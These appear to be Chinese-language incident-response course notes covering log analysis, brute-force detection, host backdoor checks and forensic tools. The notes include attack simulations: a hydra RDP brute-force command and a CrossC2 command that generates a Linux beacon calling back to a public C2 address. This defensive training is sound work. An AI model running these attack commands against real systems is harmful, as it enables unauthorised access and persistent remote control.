一、应急响应过程
目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案 保护阶段:直接断网,保护现场,看是否能够恢复数据 分析阶段:对入侵过程进行分析,常见方法为指纹库搜索、日志时间分析、后门追查分析、漏洞检查分析等 复现阶段:还原攻击过程,模拟攻击者入侵思路,关注攻击者在系统中应用的漏洞、手法 修复阶段:分析原因后,修补相关系统、应用漏洞,如果存在后门或弱口令,及时清除并整改 建议阶段:对攻击者利用的漏洞进行修补,加强系统安全同时提高安全意识
二、必备知识点
1、熟悉常用的web安全攻击技术 2、熟悉相关日志启用以及存储查看等 3、熟悉日志中记录数据分类和分析等
三、准备工作
1、收集目标服务器信息 2、部署相关分析软件和平台等 3、整理相关安全渗透测试工具指纹库 4、针对异常表现第一时间触发思路
从受害方提供的信息预估入侵面以及权限面进行排查,分为有明确信息和无明确信息两种情况:1、如果有明确信息的情况下,基本上会提出关于时间、操作以及指纹这一类的相关信息
- 基于时间:如果受害方提供了文件被修改日期、异常登录日期,那么我们就可以锁定这一时期的相关日志进行查看,不必去大海捞针一天天地看日志了。从而有针对性地对目标攻击事件进行分析。
- 基于操作:如果受害方提供了被删除、被加密的数据、文件位置,如数据库、磁盘等,那么我们可以根据攻击者的操作判断它入侵了哪些地方并可能分析出攻击过程。
- 基于指纹:如果受害方只说是网页被修改、网站被上马,那么我们可以根据攻击工具的指纹、木马的指纹、病毒的指纹、修改的内容等判断攻击者使用了何种工具、处于何种技术水平。
2、如果无明确信息的情况下,那么就需要排查全部可能入侵的手法:
- web漏洞:检查源码类别和漏洞情况
- 中间件漏洞:检查对应版本和漏洞情况
- 第三方应用漏洞:检查是否存在漏洞应用
- 操作系统漏洞:检查是否存在系统漏洞
- 其他安全问题:检查相关用户口令以及后门扫描
四、演示案例
(一)windows+IIS+SQL日志搜索
1、查询IIS日志文件存放位置
2、根据网站的ID号寻找对应的日志
3、找到日志后查看攻击语句
4、根据指纹判断攻击所采用的了何种攻击
(二)linux+BT+Nginx+tp5日志后门
1、在宝塔面板中下载日志至本地
2、分析日志,查看工具指纹和攻击请求IP,锁定攻击IP
3、宝塔自带后门查杀
(三)简单分析日志
360星图
- 只支持apache、iis、nginx
- 需配置conf
其他好用的工具还有ELK、Splunk、FileSeek。其中ELK和Splunk部署相对比较麻烦。
74 - 操作系统分析(病毒、后门)- 应急响应
一、常见思路及分析
(一)常见危害
暴力破解:针对系统有包括rdp、ssh、telnet等,针对服务有包括mysql、ftp等,一般可以通过超级弱口令工具、hydra进行爆破 漏洞利用:通过系统、服务的漏洞进行攻击,如永恒之蓝等 流量攻击:主要是对目标机器进行dos攻击,从而导致服务器瘫痪 木马控制:主要分为webshell和PC木马,webshell是存在于网站应用中的,而PC木马是进入系统进行植入的。目的是对系统进行持久控制 病毒感染:主要分挖矿病毒、蠕虫病毒、勒索病毒等,对目标文件或目录进行加密,用户需要支付酬金给黑客
(二)常见分析
账户:账户异常、账户增加,看攻击者是否留有后门账户 端口:异常端口开放,看是否与外部地址的某个端口建立了连接 进程:异常进程加载,看是否存在异常进程执行(排除系统正常进程) 网络:网络连接异常,看是否对局域网内其他IP地址进行请求(横向)或自身网络异常 启动:异常程序开机自启动,看是否存在开机自启动的程序,排查是否为恶意程序 服务:异常服务添加、启动,看机器上是否存在异常服务(排除系统正常服务) 任务:异常定时任务执行,看机器上是否存在定时任务 文件:异常文件,看机器上是否存在异常文件,如后门、病毒、木马等
(三)常见日志类别及存储
(1)windows
事件查看器》windows日志(包括应用程序、安全、Setup、系统、事件)
(2)linux
cd /var/log
(四)补充资料
https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html https://docs.microsoft.com/en-us/sysinternals/
二、实战案例
(一)攻击响应-暴力破解(RDP、SSH)
通过kali模拟攻击对rdp服务进行暴力破解
hydra -l mac -P /usr/share/wordlists/metasploit/password.lst rdp://172.16.54.42 -s 3389 -vV
(1)手动查看RDP
在win系统中需开启审核策略(成功、失败),同时查看windows日志,关注事件归类、事件ID、事件状态等
可以发现爆破账户为mac,黑客主机名为kali
(2)工具查看RDP
对SSH进行爆破 1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c
2、输出登录爆破的第一行和最后一行,确认爆破时间范围
grep "Failed password" /var/log/secure|head -1 grep "Failed password" /var/log/secure|tail -1
3、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[04][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][09]?)"|uniq -c | sort -nr
4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort nr
5、登录成功的日期、用户名、IP
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
(二)控制响应-后门木马(webshell、PC)
windows:默认配置测试 注:windows高版本网络信息获取不全(win2012及以上)
linux:借助 CrossC2 项目
netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程:http://www.adminxe.com/1287.html
1.项目上传至CS服务端目录,给予执行权限
2.配置监听器:监听器为windows/beacon_https/reverse_https 注:如果是阿里云记得端口放行,同时需要关闭linux默认防火墙
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及 windows 日志分析或执行记录查找后门问题
(三)危害响应-病毒感染(勒索 WannaCry)-Windows
详细说明中毒表现及恢复指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
(四)自动化响应检测
Gscan 多重功能脚本测试-Linux
python3 GScan.py
三、涉及资源:
https://xz.aliyun.com/t/485 https://lesuobingdu.360.cn/ https://github.com/gloxec/CrossC2/ https://github.com/darkr4y/geacon/ https://github.com/grayddq/GScan/ https://bbs.pediy.com/thread-217586-1.htm https://www.nomoreransom.org/zh/index.html https://docs.microsoft.com/en-us/sysinternals/ https://www.secpulse.com/archives/114019.html
#网盘链接 失效不补https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:xiao
75 - 第三方应用分析及应急取证 - 应急响应
一、必备知识点
1、第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知与口令相关的攻击也要进行筛选。2、排除第三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本 3、由于工具和脚本更新迭代快、分类复杂,那么打造自己的工具箱迫在眉睫
二、案例分析
(一)win日志分析神器 - LogonTracer
如果是阿里云主机需要开放端口并关闭防火墙 1、下载并解压neo4j 下载地址:https://github.com/JPCERTCC/LogonTracer
git clone https://github.com/neo4j/neo4j
tar -zvxf neo4j-community-4.2.1-unix.tar
2、安装java11环境
sudo yum install java-11-openjdk -y
3、修改neo4j配置保证外部访问
dbms.connector.bolt.listen_address=0.0.0.0:7687
4、开启neo4j
./bin/neo4j console &
截屏2021-08-22 上午8.39.54
5、下载Logontracer并安装库
git clone https://github.com/JPCERTCC/LogonTracer.git
pip3 install -r requirements.txt
6、启动Logontracer并导入日志分析文件
python3 logontracer.py -r -o [PORT] -u [USERNAME] -p [PASSWORD] -s [IP 地址]
python3 logontracer.py -r -o 8080 -u neo4j -p xiaodi -s 47.98.99.126
截屏2021-08-22 上午8.42.20
python3 logontracer.py -e [EVTX 文件] -z [时区] -u [用户名] -p [密码] -s [IP 地址]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.1
截屏2021-08-22 上午8.46.16
7、刷新访问LogonTracer-web_gui,查看分析结果
(二)数据库(Mysql、Msql、Oracle等)日志分析(爆破注入)
常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等,对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景和溯源攻击源
(1)Mysql
1、日志启用并查看
show variables like "%gengeral";
SET GLOBAL general_log = 'On';
# 这里可以设置mysql日志存放目录
SET GLABAL general_log_file = '/var/lib/mysql/mysql.log'
2、通过超级弱口令工具(snetcraker)对目标进行爆破模拟攻击
3、查看日志并分析
(2)Mssql
1、查看日志
2、配置跟踪文件
3、对Mssql进行攻击并实时查看日志
(三)自查漏洞模拟渗透测试寻找攻击源(漏洞、口令检索)
主要针对以下两种情况:
- 日志被删或没利用价值
- 没有思路进行分析且可以采用模拟渗透
(1)系统漏洞自查(win、lin)
主要工具为WindowsvulnScan、linux-exploit-suggester
1、windows自查
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
如果出现报错,将KB.json切换为utf-8模式
2、linux自查
./linux-exploit-suggester.sh
工具地址 https://github.com/chroblert/WindowsVulnScan https://github.com/mzet-/linux-exploit-suggester
(2)服务漏洞自查
1、Windows
Get-WmiObject -class Win32_Product
2、Linux 地址:https://github.com/rebootuser/LinEnum
./LinEnum.sh
3、根据检索出来的服务进行漏洞扫描 主要使用searchsploit,比如weblogic
searchsploit weblogic
其中查询的漏洞分别为dos、local、remote、webapps
(四)自动化工具ir-rescue应急响应工具箱
地址:https://github.com/diogo-fernan/ir-rescue
主要用于打造自己的应急工具箱